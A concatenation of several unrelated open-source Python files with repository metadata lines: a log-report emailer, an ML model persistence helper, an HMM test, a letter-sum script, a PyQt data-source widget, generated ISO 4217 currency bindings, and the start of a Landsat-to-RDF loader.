EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REFERER_ULS_ROWS', __TOP_REFERER_ULS_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__LONGEST_RESPONSE_TIME_URLS_ROWS', __LONGEST_RESPONSE_TIME_URLS_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__LARGEST_RESPONSE_SIZE_URLS_ROWS', __LARGEST_RESPONSE_SIZE_URLS_ROWS)
#f = open('DATA/email.html', 'w')
#f.write(EMAIL_HTML_TEMPLATE)
#f.close()
print('\n\n * Sending email report ..')
try:
smtpObj = smtplib.SMTP('localhost')
smtpObj.sendmail( 'test@test.com', TO_EMAILS , EMAIL_HTML_TEMPLATE)
print " \t Successfully sent email .."
except SMTPException:
print "Error: unable to send email"
##################################################
# Section 02. Finazlization #
##################################################
#remove temp log files
for file in os.listdir(TEMP_DIR):
file_path = os.path.join(TEMP_DIR, file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
#elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception , e:
print(e)
| Aelshafei/a2lr | a2lr.py | Python | apache-2.0 | 21,273 |
import os, errno
from sklearn.externals import joblib
from digoie.conf.storage import __ml_models_dir__
# ML_MODEL_PATH = __root_dir__ + 'classifier/mla/models/'
MODEL_EXT = '.pkl'
def save_model(model_name, clf):
# os.remove(model_name) if os.path.exists(model_name) else None
path = os.path.join(__ml_models_dir__, model_name)
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(path, model_name + MODEL_EXT)
joblib.dump(clf, path)
def load_model(model_name):
path = os.path.join(__ml_models_dir__, model_name, model_name + MODEL_EXT)
return joblib.load(path) | ZwEin27/digoie-annotation | digoie/core/ml/dataset/model.py | Python | mit | 617 |
from HMMchain import HMMchain
def setUp(self):
self.states = ('AG_rich', 'CT_rich')
self.observations = (0, 1, 2, 3)
self.start_probability = {'AG_rich': 0.6, 'CT_rich': 0.4}
self.transition_probability = {
'AG_rich' : {'AG_rich': 0.8, 'CT_rich': 0.2},
'CT_rich' : {'AG_rich': 0.4, 'CT_rich': 0.6}
}
self.emission_probability = {
'AG_rich' : {2: 0.5, 1: 0.1, 3: 0.3, 0:0.1},
'CT_rich' : {2: 0.1, 1: 0.4, 3: 0.1, 0:0.4}
}
self.N = 10
def test_simulate(self):
res0, res1 = (['CT_rich',
'CT_rich',
'CT_rich',
'AG_rich',
'AG_rich',
'CT_rich',
'CT_rich',
'AG_rich',
'AG_rich',
'AG_rich'],
[3, 1, 0, 2, 2, 1, 0, 2, 0, 3])
self.assertEqual((res0, res1)) | edenhuangSH/STA663_Final_Project | linearhmm/test_HMMchain.py | Python | gpl-3.0 | 907 |
#!/usr/bin/env python3
"""docstring"""
import os
import sys
args = sys.argv[1:]
if len(args) != 1:
print('Usage: {} WORD'.format(os.path.basename(sys.argv[0])))
sys.exit(1)
word = args[0]
number = 0
for letter in word:
number += ord(letter)
print('"{}" = "{}"'.format(word, number))
| kyclark/metagenomics-book | python/map/gematria2.py | Python | gpl-3.0 | 301 |
"""
/***************************************************************************
Name : Composer Data Source Selector
Description : Widget for selecting a database table or view that will
be used across the composition by the STDM data labels.
Date : 14/May/2014
copyright : (C) 2014 by John Gitau
email : gkahiu@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtGui import (
QWidget,
QComboBox
)
from stdm.data import (
pg_tables,
pg_views
)
from .ui_composer_data_source import Ui_frmComposerDataSource
class ComposerDataSourceSelector(QWidget,Ui_frmComposerDataSource):
"""
Widget for selecting a database table or view.
"""
def __init__(self,parent = None):
QWidget.__init__(self,parent)
self.setupUi(self)
self.cboDataSource.setInsertPolicy(QComboBox.InsertAlphabetically)
self.rbTables.toggled.connect(self.onShowTables)
self.rbViews.toggled.connect(self.onShowViews)
#Force views to be loaded
self.rbViews.toggle()
#Connect signal
#self.cboDataSource.currentIndexChanged[str].connect(self.onDataSourceSelected)
def onDataSourceSelected(self,dataSource):
"""
Slot raised upon selecting a data source from the items.
"""
pass
def category(self):
"""
Returns the category (view or table) that the data source belongs to.
"""
if self.rbTables.isChecked():
return "Table"
elif self.rbViews.isChecked():
return "View"
def setCategory(self,categoryName):
"""
Set selected radio button.
"""
if categoryName == "Table":
self.rbTables.toggle()
elif categoryName == "View":
self.rbViews.toggle()
def setSelectedSource(self,dataSourceName):
"""
Set the data source name if it exists in the list.
"""
sourceIndex = self.cboDataSource.findText(dataSourceName)
if sourceIndex != -1:
self.cboDataSource.setCurrentIndex(sourceIndex)
def onShowTables(self,state):
"""
Slot raised to show STDM database tables.
"""
if state:
self.cboDataSource.clear()
self.cboDataSource.addItem("")
self.cboDataSource.addItems(pg_tables())
def onShowViews(self,state):
"""
Slot raised to show STDM database views.
"""
if state:
self.cboDataSource.clear()
self.cboDataSource.addItem("")
self.cboDataSource.addItems(pg_views()) | olivierdalang/stdm | ui/composer/composer_data_source.py | Python | gpl-2.0 | 3,563 |
# .\_iso4217a.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:f9dcf879a5f7be5b1c0f8faa708fbb3a510f2212
# Generated 2015-08-12 15:54:17.336000 by PyXB version 1.2.4 using Python 2.7.0.final.0
# Namespace http://ddex.net/xml/20100121/iso4217a [xmlns:iso4217a]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:9d0dcd70-40f9-11e5-9eef-b870f477ffbe')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://ddex.net/xml/20100121/iso4217a', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://ddex.net/xml/20100121/iso4217a}CurrencyCode
class CurrencyCode (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An ISO4217 three-letter code representing a Currency."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurrencyCode')
_XSDLocation = pyxb.utils.utility.Location('http://ddex.net/xml/20100121/iso4217a.xsd', 3, 4)
_Documentation = 'An ISO4217 three-letter code representing a Currency.'
CurrencyCode._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CurrencyCode, enum_prefix=None)
CurrencyCode.ADP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ADP', tag='ADP')
CurrencyCode.AED = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AED', tag='AED')
CurrencyCode.AFA = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AFA', tag='AFA')
CurrencyCode.ALL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ALL', tag='ALL')
CurrencyCode.AMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AMD', tag='AMD')
CurrencyCode.ANG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ANG', tag='ANG')
CurrencyCode.AOA = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AOA', tag='AOA')
CurrencyCode.ARS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ARS', tag='ARS')
CurrencyCode.ATS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ATS', tag='ATS')
CurrencyCode.AUD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AUD', tag='AUD')
CurrencyCode.AWG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AWG', tag='AWG')
CurrencyCode.AZM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AZM', tag='AZM')
CurrencyCode.BAM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BAM', tag='BAM')
CurrencyCode.BBD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BBD', tag='BBD')
CurrencyCode.BDT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BDT', tag='BDT')
CurrencyCode.BEF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BEF', tag='BEF')
CurrencyCode.BGN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BGN', tag='BGN')
CurrencyCode.BHD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BHD', tag='BHD')
CurrencyCode.BIF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BIF', tag='BIF')
CurrencyCode.BMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BMD', tag='BMD')
CurrencyCode.BND = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BND', tag='BND')
CurrencyCode.BOB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BOB', tag='BOB')
CurrencyCode.BOV = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BOV', tag='BOV')
CurrencyCode.BRL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BRL', tag='BRL')
CurrencyCode.BSD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BSD', tag='BSD')
CurrencyCode.BTN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BTN', tag='BTN')
CurrencyCode.BWP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BWP', tag='BWP')
CurrencyCode.BYR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BYR', tag='BYR')
CurrencyCode.BZD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BZD', tag='BZD')
CurrencyCode.CAD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CAD', tag='CAD')
CurrencyCode.CDF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CDF', tag='CDF')
CurrencyCode.CHF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CHF', tag='CHF')
CurrencyCode.CLP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CLP', tag='CLP')
CurrencyCode.CNY = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CNY', tag='CNY')
CurrencyCode.COP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='COP', tag='COP')
CurrencyCode.CRC = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CRC', tag='CRC')
CurrencyCode.CUP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CUP', tag='CUP')
CurrencyCode.CVE = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CVE', tag='CVE')
CurrencyCode.CYP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CYP', tag='CYP')
CurrencyCode.CZK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CZK', tag='CZK')
CurrencyCode.DEM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DEM', tag='DEM')
CurrencyCode.DJF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DJF', tag='DJF')
CurrencyCode.DKK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DKK', tag='DKK')
CurrencyCode.DOP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DOP', tag='DOP')
CurrencyCode.DZD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DZD', tag='DZD')
CurrencyCode.EEK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='EEK', tag='EEK')
CurrencyCode.EGP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='EGP', tag='EGP')
CurrencyCode.ERN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ERN', tag='ERN')
CurrencyCode.ESP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ESP', tag='ESP')
CurrencyCode.ETB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ETB', tag='ETB')
CurrencyCode.EUR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='EUR', tag='EUR')
CurrencyCode.FIM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FIM', tag='FIM')
CurrencyCode.FJD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FJD', tag='FJD')
CurrencyCode.FKP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FKP', tag='FKP')
CurrencyCode.FRF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FRF', tag='FRF')
CurrencyCode.GBP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GBP', tag='GBP')
CurrencyCode.GEL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GEL', tag='GEL')
CurrencyCode.GHC = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GHC', tag='GHC')
CurrencyCode.GIP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GIP', tag='GIP')
CurrencyCode.GMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GMD', tag='GMD')
CurrencyCode.GNF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GNF', tag='GNF')
CurrencyCode.GRD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GRD', tag='GRD')
CurrencyCode.GTQ = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GTQ', tag='GTQ')
CurrencyCode.GWP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GWP', tag='GWP')
CurrencyCode.GYD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GYD', tag='GYD')
CurrencyCode.HKD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HKD', tag='HKD')
CurrencyCode.HNL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HNL', tag='HNL')
CurrencyCode.HRK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HRK', tag='HRK')
CurrencyCode.HTG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HTG', tag='HTG')
CurrencyCode.HUF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HUF', tag='HUF')
CurrencyCode.IDR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IDR', tag='IDR')
CurrencyCode.IEP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IEP', tag='IEP')
CurrencyCode.ILS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ILS', tag='ILS')
CurrencyCode.INR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='INR', tag='INR')
CurrencyCode.IQD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IQD', tag='IQD')
CurrencyCode.IRR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IRR', tag='IRR')
CurrencyCode.ISK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ISK', tag='ISK')
CurrencyCode.ITL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ITL', tag='ITL')
CurrencyCode.JMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='JMD', tag='JMD')
CurrencyCode.JOD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='JOD', tag='JOD')
CurrencyCode.JPY = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='JPY', tag='JPY')
CurrencyCode.KES = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KES', tag='KES')
CurrencyCode.KGS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KGS', tag='KGS')
CurrencyCode.KHR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KHR', tag='KHR')
CurrencyCode.KMF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KMF', tag='KMF')
CurrencyCode.KPW = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KPW', tag='KPW')
CurrencyCode.KRW = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KRW', tag='KRW')
CurrencyCode.KWD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KWD', tag='KWD')
CurrencyCode.KYD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KYD', tag='KYD')
CurrencyCode.KZT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KZT', tag='KZT')
CurrencyCode.LAK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LAK', tag='LAK')
CurrencyCode.LBP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LBP', tag='LBP')
CurrencyCode.LKR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LKR', tag='LKR')
CurrencyCode.LRD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LRD', tag='LRD')
CurrencyCode.LSL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LSL', tag='LSL')
CurrencyCode.LTL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LTL', tag='LTL')
CurrencyCode.LUF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LUF', tag='LUF')
CurrencyCode.LVL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LVL', tag='LVL')
CurrencyCode.LYD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LYD', tag='LYD')
CurrencyCode.MAD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MAD', tag='MAD')
CurrencyCode.MDL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MDL', tag='MDL')
CurrencyCode.MGF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MGF', tag='MGF')
CurrencyCode.MKD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MKD', tag='MKD')
CurrencyCode.MMK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MMK', tag='MMK')
CurrencyCode.MNT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MNT', tag='MNT')
CurrencyCode.MOP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MOP', tag='MOP')
CurrencyCode.MRO = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MRO', tag='MRO')
CurrencyCode.MTL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MTL', tag='MTL')
CurrencyCode.MUR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MUR', tag='MUR')
CurrencyCode.MVR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MVR', tag='MVR')
CurrencyCode.MWK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MWK', tag='MWK')
CurrencyCode.MXN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MXN', tag='MXN')
CurrencyCode.MYR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MYR', tag='MYR')
CurrencyCode.MZM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MZM', tag='MZM')
CurrencyCode.NAD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NAD', tag='NAD')
CurrencyCode.NGN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NGN', tag='NGN')
CurrencyCode.NIO = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NIO', tag='NIO')
CurrencyCode.NLG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NLG', tag='NLG')
CurrencyCode.NOK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NOK', tag='NOK')
CurrencyCode.NPR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NPR', tag='NPR')
CurrencyCode.NZD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NZD', tag='NZD')
CurrencyCode.OMR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='OMR', tag='OMR')
CurrencyCode.PAB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PAB', tag='PAB')
CurrencyCode.PEN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PEN', tag='PEN')
CurrencyCode.PGK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PGK', tag='PGK')
CurrencyCode.PHP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PHP', tag='PHP')
CurrencyCode.PKR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PKR', tag='PKR')
CurrencyCode.PLN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PLN', tag='PLN')
CurrencyCode.PTE = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PTE', tag='PTE')
CurrencyCode.PYG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PYG', tag='PYG')
CurrencyCode.QAR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='QAR', tag='QAR')
CurrencyCode.ROL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ROL', tag='ROL')
CurrencyCode.RUB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='RUB', tag='RUB')
CurrencyCode.RWF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='RWF', tag='RWF')
CurrencyCode.SAR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SAR', tag='SAR')
CurrencyCode.SBD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SBD', tag='SBD')
CurrencyCode.SCR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SCR', tag='SCR')
CurrencyCode.SDD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SDD', tag='SDD')
CurrencyCode.SEK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SEK', tag='SEK')
CurrencyCode.SGD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SGD', tag='SGD')
CurrencyCode.SHP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SHP', tag='SHP')
CurrencyCode.SIT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SIT', tag='SIT')
CurrencyCode.SKK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SKK', tag='SKK')
CurrencyCode.SLL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SLL', tag='SLL')
CurrencyCode.SOS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SOS', tag='SOS')
CurrencyCode.SRD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SRD', tag='SRD')
CurrencyCode.STD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='STD', tag='STD')
CurrencyCode.SVC = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SVC', tag='SVC')
CurrencyCode.SYP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SYP', tag='SYP')
CurrencyCode.SZL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SZL', tag='SZL')
CurrencyCode.THB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='THB', tag='THB')
CurrencyCode.TJS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TJS', tag='TJS')
CurrencyCode.TMM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TMM', tag='TMM')
CurrencyCode.TND = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TND', tag='TND')
CurrencyCode.TOP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TOP', tag='TOP')
CurrencyCode.TPE = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TPE', tag='TPE')
CurrencyCode.TRL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TRL', tag='TRL')
CurrencyCode.TTD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TTD', tag='TTD')
CurrencyCode.TWD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TWD', tag='TWD')
CurrencyCode.TZS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TZS', tag='TZS')
CurrencyCode.UAH = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UAH', tag='UAH')
CurrencyCode.UGX = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UGX', tag='UGX')
CurrencyCode.USD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='USD', tag='USD')
CurrencyCode.UYU = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UYU', tag='UYU')
CurrencyCode.UZS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UZS', tag='UZS')
CurrencyCode.VEB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='VEB', tag='VEB')
CurrencyCode.VND = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='VND', tag='VND')
CurrencyCode.VUV = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='VUV', tag='VUV')
CurrencyCode.WST = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='WST', tag='WST')
CurrencyCode.XAF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XAF', tag='XAF')
CurrencyCode.XCD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XCD', tag='XCD')
CurrencyCode.XOF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XOF', tag='XOF')
CurrencyCode.XPF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XPF', tag='XPF')
CurrencyCode.YER = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='YER', tag='YER')
CurrencyCode.YUM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='YUM', tag='YUM')
CurrencyCode.ZAR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ZAR', tag='ZAR')
CurrencyCode.ZMK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ZMK', tag='ZMK')
CurrencyCode.ZWD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ZWD', tag='ZWD')
CurrencyCode._InitializeFacetMap(CurrencyCode._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CurrencyCode', CurrencyCode)
| Trax-air/ddexreader | ddexreader/ern312/_iso4217a.py | Python | mit | 20,742 |
#!/usr/bin/env python3
"""Loads an HDF5 file representing Landsat data into a triple store via
SPARQL."""
from argparse import ArgumentParser
from base64 import b64encode
from io import StringIO, BytesIO
from itertools import islice, chain
from dateutil.parser import parse as date_parse
import h5py
import numpy as np
from scipy.misc import toimage
from screw_rdflib import (ConjunctiveGraph, Literal, Namespace, OWL, RDF, RDFS,
XSD, URIRef, BNode, Graph)
# RDF namespaces
GEO = Namespace('http://www.w3.org/2003/01/geo/wgs84_pos#')
LED = Namespace('http://www.example.org/ANU-LED#')
QB = Namespace('http://purl.org/linked-data/cube#')
SDMXC = Namespace('http://purl.org/linked-data/sdmx/2009/concept#')
SDMXD = Namespace('http://purl.org/linked-data/sdmx/2009/dimension#')
SDMXM = Namespace('http://purl.org/linked-data/sdmx/2009/measure#')
OGC = Namespace('http://www.opengis.net/ont/geosparql#')
# Default graph to update (doesn't really matter because default graph on query
# is union of all named graphs)
DEFAULT = LED.lsGraph
# Boilerplate turtles are the best turtles
BOILERPLATE_TURTLE = """
@prefix : <{LED}> .
@prefix rdf: <{RDF}> .
@prefix rdfs: <{RDFS}> .
@prefix xsd: <{XSD}> .
@prefix qb: <{QB}> .
@prefix sdmx-concept: <{SDMXC}> .
@prefix sdmx-dimension: <{SDMXD}> .
@prefix sdmx-measure: <{SDMXM}> .
@prefix geo: <{GEO}> .
@prefix owl: <{OWL}> .
@prefix ogc: <{OGC}> .
@prefix gcmd-platform: <http://geobrain.laits.gmu.edu/ontology/2004/11/gcmd-platform.owl#> .
@prefix gcmd-instrument: <http://geobrain.laits.gmu.edu/ontology/2004/11/gcmd-instrument.owl#> .
:landsatDSD a qb:DataStructureDefinition ;
qb:component :instrumentComponent
, :positionComponent
, :satelliteComponent
, :timeComponent
, :dataComponent
, :etmBandComponent
, :dggsComponent
, :dggsCellComponent
, :dggsLevelSquareComponent
, :dggsLevelPixelComponent .
:landsatDS a qb:DataSet ;
rdfs:label "Landsat sensor data"@en ;
rdfs:comment "Some data from LandSat, retrieved from AGDC"@en ;
qb:structure :landsatDSD ;
:instrument gcmd-instrument:SCANNER ;
:satellite gcmd-platform:LANDSAT-7 ;
:dggs "rHEALPix WGS84 Ellipsoid" .
:instrumentComponent a qb:ComponentSpecification ;
qb:attribute :instrument .
:positionComponent a qb:ComponentSpecification ;
qb:dimension :location .
:satelliteComponent a qb:ComponentSpecification ;
qb:attribute :satellite .
:timeComponent a qb:ComponentSpecification ;
qb:dimension :time .
:dataComponent a qb:ComponentSpecification ;
qb:measure :imageData .
